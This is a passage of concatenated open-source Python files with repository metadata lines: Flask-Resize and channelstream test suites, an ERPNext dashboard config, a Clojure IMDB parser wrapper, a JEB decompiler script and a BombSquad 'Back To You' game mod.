resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
@requires_redis
@slow
def test_bin_list_cache_empty(env, redis_cache):
assert run(env, 'flask-resize', 'list', 'cache') == []
@requires_redis
@slow
def test_bin_list_has_cache(env, redis_cache):
redis_cache.add('hello')
redis_cache.add('buh-bye')
assert set(run(env, 'flask-resize', 'list', 'cache')) == \
{'hello', 'buh-bye'}
@slow
def test_bin_clear_images(
env,
resizetarget_opts,
image1_name,
image1_data
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
run(env, 'flask-resize', 'clear', 'images')
assert run(env, 'flask-resize', 'list', 'images') == []
@requires_redis
@slow
def test_bin_clear_cache(env, redis_cache):
redis_cache.add('foo bar')
assert run(env, 'flask-resize', 'clear', 'cache') == []
@requires_redis
@slow
def test_bin_sync_cache(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key,
redis_cache
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
redis_cache.clear()
assert run(env, 'flask-resize', 'list', 'cache') == []
run(env, 'flask-resize', 'sync', 'cache')
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
| jmagnusson/Flask-Resize | tests/test_bin.py | Python | bsd-2-clause | 2,759 | 0 |
from __future__ import unicode_literals
from frappe import _
def get_data():
return {
'fieldname': 'therapy_session',
'transactions': [
{
'label': _('Assessments'),
'items': ['Patient Assessment']
}
]
}
| gsnbng/erpnext | erpnext/healthcare/doctype/therapy_session/therapy_session_dashboard.py | Python | agpl-3.0 | 226 | 0.044248 |
#!/usr/bin/python
#
# Copyright 2012 Anthony Campbell (anthonycampbell.co.uk)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Required imports
import os, getopt, sys, re, subprocess, exceptions
# Constants
_default_output_file = "./output.txt"
_script_directory = os.path.dirname(os.path.realpath(__file__))
# Help
_help = """
Clojure IMDB Parser
__file__ [options]
Simple wrapper script for the Clojure IMDB parser.
Options:
-q --query Option which specifies the query text.
    -f --file                  Option which writes the search result to the default output file: __default_output_file__
    -o --output [path/to/file] If specified, writes the search result to a file.
-v --verbose Option to enable verbose output.
-h -? --help Option to display this text.
Examples:
__file__ -q "Clash of the Titans" -o output.txt
__file__ --query "Clash of the Titans" --output output.txt
"""
_help = _help.replace("__file__", __file__)
_help = _help.replace("__default_output_file__", _default_output_file)
# Main method
def main():
# Initialise variables
verbose = False
output = ""
query_term = ""
output_file = ""
latest_jar = ""
try:
opts, args = getopt.getopt(sys.argv[1:], "q:fo:?hv", ["query=", "file", "output=", "help", "verbose"])
except getopt.GetoptError as error:
# Print help information and exit:
print "\n " + str(error)
print _help
sys.exit(2)
for option, argument in opts:
if option in ("-q", "--query"):
query_term = str(argument)
elif option in ("-f", "--file"):
output_file = _default_output_file
elif option in ("-o", "--output"):
output_file = str(argument)
elif option in ("-v", "--verbose"):
verbose = True
elif option in ("-h", "--help"):
print _help
sys.exit(0)
# Check we're good to go
if query_term == None or query_term == "":
print _help
sys.exit(2)
if verbose:
print "\n Clojure IMDB Parser"
try:
# Determine newest parser
process = subprocess.Popen(["ls -r " + _script_directory + "/release | grep \"clojure-imdb-parser.*.jar\" | head -n 1"],
stdout=subprocess.PIPE, shell=True)
latest_jar, stderr = process.communicate()
process.wait()
except exceptions.Exception as error:
print "\n Unable to find latest clojure-imdb-parser.jar:"
print "\n " + str(error)
sys.exit(1)
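    # A non-shell alternative (illustrative sketch only, assuming the same
    # release/ layout): the newest jar can also be located without the
    # `ls | grep | head` pipeline, e.g.
    #   jars = sorted(f for f in os.listdir(_script_directory + "/release")
    #                 if re.match(r"clojure-imdb-parser.*\.jar", f))
    #   latest_jar = jars[-1] if jars else ""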
if latest_jar != None and str(latest_jar) != "":
latest_jar = _script_directory + "/release/" + str(latest_jar)
# Clean up path
pattern = re.compile(r'\n')
latest_jar = pattern.sub(" ", latest_jar).strip()
if verbose:
print "\n Latest clojure-imdb-parser.jar:"
print "\n " + latest_jar + "\n"
try:
# Execute the parser
process = subprocess.Popen(["java", "-jar", latest_jar, query_term, output_file, str(verbose)],
stdout=subprocess.PIPE)
output, stderr = process.communicate()
process.wait()
except exceptions.Exception as error:
print "\n Unable to execute clojure-imdb-parser.jar!"
print "\n " + str(error)
sys.exit(1)
else:
print "\n Unable to find latest clojure-imdb-parser.jar!"
sys.exit(1)
# Where we at?
print output
# If we're being run directly
if __name__ == "__main__":
main()
|
acampbell3000/clojure-imdb-parser
|
run.py
|
Python
|
apache-2.0
| 4,140 | 0.003623 |
# JEB sample script
# http://www.android-decompiler.com/
#
# AlertMarker.py
# Set (unset) alert marker to focused method.
#
# Copyright (c) 2013 SecureBrain
from jeb.api import IScript
from jeb.api.dex import Dex
from jeb.api.ui import View
import string
class AlertMarker(IScript):
def run(self, jeb):
self.jeb = jeb
self.dex = jeb.getDex()
self.ui = jeb.getUI()
success = self.start()
def start(self):
view = self.ui.getView(View.Type.ASSEMBLY)
msig = view.getCodePosition().getSignature()
md = self.dex.getMethodData(msig)
if not md:
print 'caret is not in method.'
return
f = md.getUserFlags()
print 'target:' + msig
if (f & Dex.FLAG_ALERT) == 0:
print 'set alert marker'
md.setUserFlags(f | Dex.FLAG_ALERT)
else:
print 'unset alert'
md.setUserFlags(f & ~Dex.FLAG_ALERT)
view.refresh()
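        # Illustrative effect (flag value assumed): if Dex.FLAG_ALERT were 0x01
        # and the current user flags 0x05, clearing stores 0x05 & ~0x01 == 0x04,
        # and setting stores 0x04 | 0x01 == 0x05 again.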
|
SecureBrain/JEB-sample-scripts
|
AlertMarker.py
|
Python
|
mit
| 1,017 | 0.000983 |
from gevent import monkey
monkey.patch_all()
import pytest
import gevent
import marshmallow
from channelstream.server_state import get_state
from channelstream.channel import Channel
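# The tests below call the WSGI view callables directly with a dummy request.
# Message delivery is handed off to gevent greenlets, which is why several
# tests call gevent.sleep(0) after posting: yielding control lets the pending
# greenlets run before the assertions inspect channel history or connections.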
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestConnectViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {}
try:
connect(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert exc.messages == {"username": ["Missing data for required field."]}
def test_good_json(self, dummy_request, test_uuids):
server_state = get_state()
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "username",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
assert server_state.channels == {}
result = connect(dummy_request)
assert len(server_state.channels.keys()) == 2
assert "username" in server_state.users
assert test_uuids[1] in server_state.connections
assert result["channels"] == ["a", "aB"]
assert result["state"] == {"bar": "baz", "key": "foo"}
assert result["conn_id"] == test_uuids[1]
channels_info = result["channels_info"]["channels"]
assert len(channels_info.keys()) == 2
assert channels_info["a"]["total_users"] == 1
assert channels_info["a"]["total_connections"] == 1
assert channels_info["a"]["users"] == ["username"]
assert channels_info["a"]["history"] == []
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "username"}
]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUserStateViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
assert excinfo.value.messages == {"user": ["Missing data for required field."]}
def _connect_user(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
def test_not_found_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {"user": "blabla"}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
assert excinfo.value.messages == {"user": ["Unknown user"]}
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
"state_public_keys": ["avatar", "bar"],
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert result["public_keys"] == ["avatar", "bar"]
assert sorted_changed == sorted(["bar", "private"])
def test_good_json_no_public_keys(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
assert result["public_keys"] == ["bar"]
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert sorted_changed == sorted(["bar", "private"])
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestSubscribeViews(object):
def test_bad_json(self, dummy_request):
from channelstream.wsgi_views.server import subscribe
dummy_request.json_body = {}
try:
subscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, subscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["b"],
"channel_configs": {
"a": {"notify_presence": True},
"b": {"notify_presence": True},
},
}
result = subscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["a", "aB", "b"])
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "test"}
]
assert "a" in result["channels_info"]["channels"]
assert "b" in result["channels_info"]["channels"]
assert result["channels_info"]["channels"]["a"]["total_connections"] == 1
assert result["channels_info"]["channels"]["a"]["total_users"] == 1
assert result["channels_info"]["channels"]["a"]["history"] == []
assert result["channels_info"]["channels"]["a"]["users"] == ["test"]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUnsubscribeViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import unsubscribe
dummy_request.json_body = {}
try:
unsubscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "aC"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["aC", "a"],
}
result = unsubscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["aB"])
def test_non_existing_channel(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "aC"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {"conn_id": str(test_uuids[1]), "channels": ["d"]}
result = unsubscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["a", "aB", "aC"])
def test_no_channels(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {"conn_id": str(test_uuids[1]), "channels": ["a"]}
result = unsubscribe(dummy_request)
assert len(result["channels"]) == 0
assert result["channels_info"]["users"] == []
assert result["channels_info"]["channels"] == {}
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestInfoView(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import info
dummy_request.json_body = {}
result = info(dummy_request)
assert result["channels"] == {}
assert result["users"] == []
def test_subscribed_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, info
dummy_request.json_body = {
"username": "test1",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"username": "test2",
"conn_id": test_uuids[2],
"fresh_user_state": {"key": "foo1"},
"user_state": {"bar": "baz1"},
"state_public_keys": ["key"],
"channels": ["a", "c"],
"channel_configs": {"c": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {}
result = info(dummy_request)
assert sorted(("a", "aB", "c")) == sorted(result["channels"].keys())
assert result["users"]
comp_a = sorted(result["channels"]["a"]["users"])
comp_b = sorted(["test1", "test2"])
assert comp_a == comp_b
assert result["channels"]["a"]["total_users"] == 2
assert result["channels"]["a"]["total_connections"] == 2
assert result["channels"]["c"]["users"] == ["test2"]
assert result["channels"]["c"]["total_users"] == 1
assert result["channels"]["c"]["total_connections"] == 1
assert result["channels"]["aB"]["users"] == ["test1"]
comp_a = sorted(result["users"], key=lambda x: x["user"])
comp_b = sorted(
[
{"state": {"bar": "baz", "key": "foo"}, "user": "test1"},
{"state": {"bar": "baz1", "key": "foo1"}, "user": "test2"},
],
key=lambda x: x["user"],
)
assert comp_a == comp_b
dummy_request.body = "NOTEMPTY"
dummy_request.json_body = {"info": {"channels": ["a"]}}
result = info(dummy_request)
assert "a" in result["channels"]
assert "aB" not in result["channels"]
def test_detailed_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, info, message
dummy_request.json_body = {
"username": "test1",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz", "private": "p1"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "c", "D"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = [
{
"type": "message",
"user": "test1",
"channel": "a",
"message": {"text": "test"},
}
]
message(dummy_request)
gevent.sleep(0)
dummy_request.body = "value"
dummy_request.json_body = {
"info": {
"exclude_channels": ["c"],
"include_history": False,
"include_users": True,
"return_public_state": True,
"include_connections": True,
}
}
result = info(dummy_request)
assert sorted(result["channels"].keys()) == sorted(["a", "aB", "D"])
assert "private" not in result["users"][0]["state"]
assert len(result["channels"]["a"]["history"]) == 0
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestMessageViews(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import message
server_state = get_state()
dummy_request.json_body = {}
assert server_state.stats["total_unique_messages"] == 0
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
message(dummy_request)
assert excinfo.value.messages == {"_schema": ["Invalid input type."]}
def test_good_json_no_channel(self, dummy_request):
from channelstream.wsgi_views.server import message
server_state = get_state()
channel = Channel("test")
channel.store_history = True
server_state.channels[channel.name] = channel
msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test"},
}
dummy_request.json_body = [msg_payload]
assert server_state.stats["total_unique_messages"] == 0
assert len(channel.history) == 0
message(dummy_request)
# change context
gevent.sleep(0)
assert server_state.stats["total_unique_messages"] == 1
assert len(channel.history) == 1
msg = channel.history[0]
assert msg["uuid"] is not None
assert msg["user"] == msg_payload["user"]
assert msg["message"] == msg_payload["message"]
assert msg["type"] == msg_payload["type"]
assert msg["channel"] == msg_payload["channel"]
assert msg["timestamp"] is not None
def test_catchup_messages(self, dummy_request):
from channelstream.wsgi_views.server import message, connect
server_state = get_state()
dummy_request.json_body = {
"username": "test1",
"channels": ["test"],
"channel_configs": {"test": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test3"},
}
dummy_request.json_body = [msg_payload]
message(dummy_request)
# add pm message to non-existing user
wrong_user_msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test1"},
"pm_users": ["test2"],
}
msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test2"},
"pm_users": ["test1"],
}
dummy_request.json_body = [wrong_user_msg_payload, msg_payload]
message(dummy_request)
# change context
gevent.sleep(0)
connection = server_state.users["test1"].connections[0]
messages = connection.get_catchup_messages()
assert len(messages) == 2
assert messages[0]["timestamp"] > connection.last_active
assert messages[0]["message"]["text"] == "test3"
assert messages[1]["timestamp"] > connection.last_active
assert messages[1]["message"]["text"] == "test2"
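        # Only the pm addressed to the existing user "test1" is delivered; the
        # one addressed to the unknown "test2" is dropped, so the catch-up list
        # holds exactly the public "test3" message and the private "test2" text.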
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestMessageEditViews(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import message
dummy_request.json_body = {}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
message(dummy_request)
assert excinfo.value.messages == {"_schema": ["Invalid input type."]}
def test_good_json_no_channel(self, dummy_request):
from channelstream.wsgi_views.server import message, messages_patch
server_state = get_state()
channel = Channel("test")
channel.store_history = True
server_state.channels[channel.name] = channel
msg_payload = {"user": "system", "channel": "test", "message": {"text": "test"}}
dummy_request.json_body = [msg_payload]
message(dummy_request)
# change context
gevent.sleep(0)
msg = channel.history[0]
assert msg["message"] == msg_payload["message"]
edit_payload = {
"uuid": msg["uuid"],
"user": "edited_system",
"channel": "test",
"timestamp": "2010-01-01T01:01",
"edited": "2010-01-01T01:02",
"message": {"text": "edited_message"},
}
dummy_request.json_body = [edit_payload]
response = messages_patch(dummy_request)[0]
gevent.sleep(0)
assert msg["user"] == response["user"]
assert msg["message"] == response["message"]
assert msg["edited"] == response["edited"]
assert msg["timestamp"] == response["timestamp"]
frame = channel.frames[0][1]
assert id(frame) == id(msg)
assert frame["user"] == response["user"]
assert frame["message"] == response["message"]
assert frame["edited"] == response["edited"]
assert frame["timestamp"] == response["timestamp"]
class TestMessageDeleteViews(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import messages_delete
dummy_request.json_body = []
result = messages_delete(dummy_request)
assert result == []
def test_good_json_no_channel(self, dummy_request):
from channelstream.wsgi_views.server import message, messages_delete
server_state = get_state()
channel = Channel("test")
channel.store_history = True
server_state.channels[channel.name] = channel
msg_payload = {"user": "system", "channel": "test", "message": {"text": "test"}}
dummy_request.json_body = [msg_payload]
message(dummy_request)
# change context
gevent.sleep(0)
msg = channel.history[0]
assert msg["message"] == msg_payload["message"]
dummy_request.json_body = [{"uuid": str(msg["uuid"]), "channel": "test"}]
response = messages_delete(dummy_request)
gevent.sleep(0)
assert response[0]["uuid"] == msg["uuid"]
assert len(channel.history) == 0
assert len(channel.frames) == 1
assert channel.frames[0][1]["type"] == "message:delete"
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestChannelConfigView(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import channel_config
dummy_request.json_body = {}
result = channel_config(dummy_request)
assert result["channels"] == {}
assert result["users"] == []
def test_valid_json(self, dummy_request):
from channelstream.wsgi_views.server import channel_config
dummy_request.json_body = {
"chanx1": {
"notify_presence": True,
"store_history": True,
"history_size": 3,
"broadcast_presence_with_user_lists": True,
"notify_state": True,
"store_frames": False,
}
}
result = channel_config(dummy_request)
channel_settings = result["channels"]["chanx1"]["settings"]
assert channel_settings["notify_presence"] is True
assert channel_settings["store_history"] is True
assert channel_settings["history_size"] == 3
assert channel_settings["broadcast_presence_with_user_lists"] is True
assert channel_settings["notify_state"] is True
assert channel_settings["store_frames"] is False
|
AppEnlight/channelstream
|
tests/tests_views.py
|
Python
|
bsd-3-clause
| 21,292 | 0.00108 |
import bs
import random
import bsUtils
#import PlayerSpaz
def bsGetAPIVersion():
# see bombsquadgame.com/apichanges
return 4
def bsGetGames():
return [BackToYou]
class Icon(bs.Actor):
def __init__(self,player,position,scale,showLives=True,showDeath=True,
nameScale=1.0,nameMaxWidth=115.0,flatness=1.0,shadow=1.0):
bs.Actor.__init__(self)
self._player = player
self._showLives = showLives
self._showDeath = showDeath
self._nameScale = nameScale
self._outlineTex = bs.getTexture('characterIconMask')
icon = player.getIcon()
self.node = bs.newNode('image',
owner=self,
attrs={'texture':icon['texture'],
'tintTexture':icon['tintTexture'],
'tintColor':icon['tintColor'],
'vrDepth':400,
'tint2Color':icon['tint2Color'],
'maskTexture':self._outlineTex,
'opacity':1.0,
'absoluteScale':True,
'attach':'bottomCenter'})
self._nameText = bs.newNode('text',
owner=self.node,
attrs={'text':player.getName(),
'color':bs.getSafeColor(player.getTeam().color),
'hAlign':'center',
'vAlign':'center',
'vrDepth':410,
'maxWidth':nameMaxWidth,
'shadow':shadow,
'flatness':flatness,
'hAttach':'center',
'vAttach':'bottom'})
if self._showLives:
self._livesText = bs.newNode('text',
owner=self.node,
attrs={'text':'x0',
'color':(1,1,0.5),
'hAlign':'left',
'vrDepth':430,
'shadow':1.0,
'flatness':1.0,
'hAttach':'center',
'vAttach':'bottom'})
self.setPositionAndScale(position,scale)
def setPositionAndScale(self,position,scale):
self.node.position = position
self.node.scale = [70.0*scale]
self._nameText.position = (position[0],position[1]+scale*52.0)
self._nameText.scale = 1.0*scale*self._nameScale
if self._showLives:
self._livesText.position = (position[0]+scale*10.0,position[1]-scale*43.0)
self._livesText.scale = 1.0*scale
def updateForLives(self):
if self._player.exists():
lives = self._player.gameData['lives']
else: lives = 0
if self._showLives:
if lives > 0: self._livesText.text = 'x'+str(lives-1)
else: self._livesText.text = ''
if lives == 0:
myAct = self._player.actor.getActivity()
if self._player in myAct.winners:
if myAct.winners[0] == self._player:
self._livesText.text = "1st"
elif myAct.winners[1] == self._player:
self._livesText.text = "2nd"
elif myAct.winners[2] == self._player:
self._livesText.text = "3rd"
else:
self._nameText.opacity = 0.2
self.node.color = (0.7,0.3,0.3)
self.node.opacity = 0.2
def handlePlayerSpawned(self):
if not self.node.exists(): return
self.node.opacity = 1.0
self.updateForLives()
def handlePlayerDied(self):
if not self.node.exists(): return
if self._showDeath:
bs.animate(self.node,'opacity',{0:1.0,50:0.0,100:1.0,150:0.0,200:1.0,250:0.0,
300:1.0,350:0.0,400:1.0,450:0.0,500:1.0,550:0.2})
lives = self._player.gameData['lives']
if lives == 0: bs.gameTimer(600,self.updateForLives)
class PlayerSpaz_BTY(bs.PlayerSpaz):
def handleMessage(self, m):
if isinstance(m, bs.HitMessage):
if not self.node.exists():
return
if not self.isAlive():
return #We don't want to be hitting corpses!
srcSpaz = None
theGame = self.getActivity()
for theSpaz in theGame.spazList:
if theSpaz.getPlayer() == m.sourcePlayer:
srcSpaz = theSpaz
break
#print(["HitSrc", srcSpaz])
#print(["hitSpaz", self])
if not srcSpaz == self:
if not srcSpaz == None:
#We need to calculate new position for hit. Otherwise it won't
#actually hit the source spaz if he's across the screen
p1 = m.pos
p2 = self.node.position
p3 = srcSpaz.node.position
hit2spaz = [p2[0]-p1[0],p2[1]-p1[1], p2[2]-p1[2]]
m.pos = [p3[0]-hit2spaz[0], p3[1]-hit2spaz[1], p3[2]-hit2spaz[2]]
m.sourcePlayer = self.getPlayer()
#print(['sroucenode', m.srcNode])
#print(['pos', m.pos])
#print(['velocity', m.velocity])
#print(['magnitude',m.magnitude])
#print(['vMag', m.velocityMagnitude])
#print(['radisu', m.radius])
#print([m.sourcePlayer])
#print(['kickback', m.kickBack])
#print(['flat', m.flatDamage])
#print(['hittype', m.hitType])
#print(['forcedir', m.forceDirection])
#print(['Hitsubtype', m.hitSubType])
super(srcSpaz.__class__, srcSpaz).handleMessage(m)
#if isinstance(m, bs.ImpactDamageMessage):
#print(["impact", m.intensity])
#super(self.__class__, self).handleMessage(m)
else:
super(self.__class__, self).handleMessage(m)
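# The hit reflection above is what sends damage "back to you": the victim's
# spaz recomputes the hit position relative to the attacker and replays the
# HitMessage on the attacker's own spaz. Illustrative numbers (assumed): a
# blast at (1, 0, 0) hitting a victim at (2, 0, 0) gives an offset of
# (1, 0, 0); for an attacker standing at (10, 0, 5) the reflected hit is
# applied at (9, 0, 5), i.e. at the same offset from the attacker.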
class BackToYou(bs.TeamGameActivity):
@classmethod
def getName(cls):
return 'Back To You!'
@classmethod
def getScoreInfo(cls):
return {'scoreName':'Survived',
'scoreType':'seconds',
'noneIsWinner':False,
'lowerIsBetter':True}
@classmethod
def getDescription(cls,sessionType):
return 'Damage others to kill yourself! First one out wins!'
@classmethod
def supportsSessionType(cls,sessionType):
return True if (issubclass(sessionType,bs.TeamsSession)
or issubclass(sessionType,bs.FreeForAllSession)) else False
@classmethod
def getSupportedMaps(cls,sessionType):
return bs.getMapsSupportingPlayType("melee")
@classmethod
def getSettings(cls,sessionType):
settings = [("Lives Per Player",{'default':1,'minValue':1,'maxValue':10,'increment':1}),
("Time Limit",{'choices':[('None',0),('1 Minute',60),
('2 Minutes',120),('5 Minutes',300),
('10 Minutes',600),('20 Minutes',1200)],'default':0}),
("Respawn Times",{'choices':[('Shorter',0.25),('Short',0.5),('Normal',1.0),('Long',2.0),('Longer',4.0)],'default':1.0}),
("Epic Mode",{'default':False})]
if issubclass(sessionType,bs.TeamsSession):
settings.append(("Solo Mode",{'default':False}))
settings.append(("Balance Total Lives",{'default':False}))
return settings
def __init__(self,settings):
bs.TeamGameActivity.__init__(self,settings)
if self.settings['Epic Mode']: self._isSlowMotion = True
# show messages when players die since it's meaningful here
self.announcePlayerDeaths = True
try: self._soloMode = settings['Solo Mode']
except Exception: self._soloMode = False
self._scoreBoard = bs.ScoreBoard()
self.spazList = []
self.winners = []
def getInstanceDescription(self):
return 'First team out wins.' if isinstance(self.getSession(),bs.TeamsSession) else 'Damage others to kill yourself! First one out wins!'
def getInstanceScoreBoardDescription(self):
return 'first team out wins' if isinstance(self.getSession(),bs.TeamsSession) else 'Damage others to kill yourself! First one out wins!'
def onTransitionIn(self):
bs.TeamGameActivity.onTransitionIn(self, music='Epic' if self.settings['Epic Mode'] else 'Survival')
self._startGameTime = bs.getGameTime()
def onTeamJoin(self,team):
team.gameData['survivalSeconds'] = None
team.gameData['spawnOrder'] = []
def onPlayerJoin(self, player):
player.gameData['lives'] = self.settings['Lives Per Player']
if self._soloMode:
player.gameData['icons'] = []
player.getTeam().gameData['spawnOrder'].append(player)
self._updateSoloMode()
else:
# create our icon and spawn
player.gameData['icons'] = [Icon(player,position=(0,50),scale=0.8)]
if player.gameData['lives'] > 0:
self.spawnPlayer(player)
# dont waste time doing this until begin
if self.hasBegun():
self._updateIcons()
def _updateSoloMode(self):
# for both teams, find the first player on the spawn order list with lives remaining
# and spawn them if they're not alive
for team in self.teams:
# prune dead players from the spawn order
team.gameData['spawnOrder'] = [p for p in team.gameData['spawnOrder'] if p.exists()]
for player in team.gameData['spawnOrder']:
if player.gameData['lives'] > 0:
if not player.isAlive(): self.spawnPlayer(player)
break
def _updateIcons(self):
# in free-for-all mode, everyone is just lined up along the bottom
if isinstance(self.getSession(),bs.FreeForAllSession):
count = len(self.teams)
xOffs = 85
x = xOffs*(count-1) * -0.5
for i,team in enumerate(self.teams):
if len(team.players) == 1:
player = team.players[0]
for icon in player.gameData['icons']:
icon.setPositionAndScale((x,30),0.7)
icon.updateForLives()
x += xOffs
# in teams mode we split up teams
else:
if self._soloMode:
# first off, clear out all icons
for player in self.players:
player.gameData['icons'] = []
# now for each team, cycle through our available players adding icons
for team in self.teams:
if team.getID() == 0:
x = -60
xOffs = -78
else:
x = 60
xOffs = 78
isFirst = True
testLives = 1
while True:
playersWithLives = [p for p in team.gameData['spawnOrder'] if p.exists() and p.gameData['lives'] >= testLives]
if len(playersWithLives) == 0: break
for player in playersWithLives:
player.gameData['icons'].append(Icon(player,
position=(x,(40 if isFirst else 25)),
scale=1.0 if isFirst else 0.5,
nameMaxWidth=130 if isFirst else 75,
nameScale=0.8 if isFirst else 1.0,
flatness=0.0 if isFirst else 1.0,
shadow=0.5 if isFirst else 1.0,
showDeath=True if isFirst else False,
showLives=False))
x += xOffs * (0.8 if isFirst else 0.56)
isFirst = False
testLives += 1
# non-solo mode
else:
for team in self.teams:
if team.getID() == 0:
x = -50
xOffs = -85
else:
x = 50
xOffs = 85
for player in team.players:
for icon in player.gameData['icons']:
icon.setPositionAndScale((x,30),0.7)
icon.updateForLives()
x += xOffs
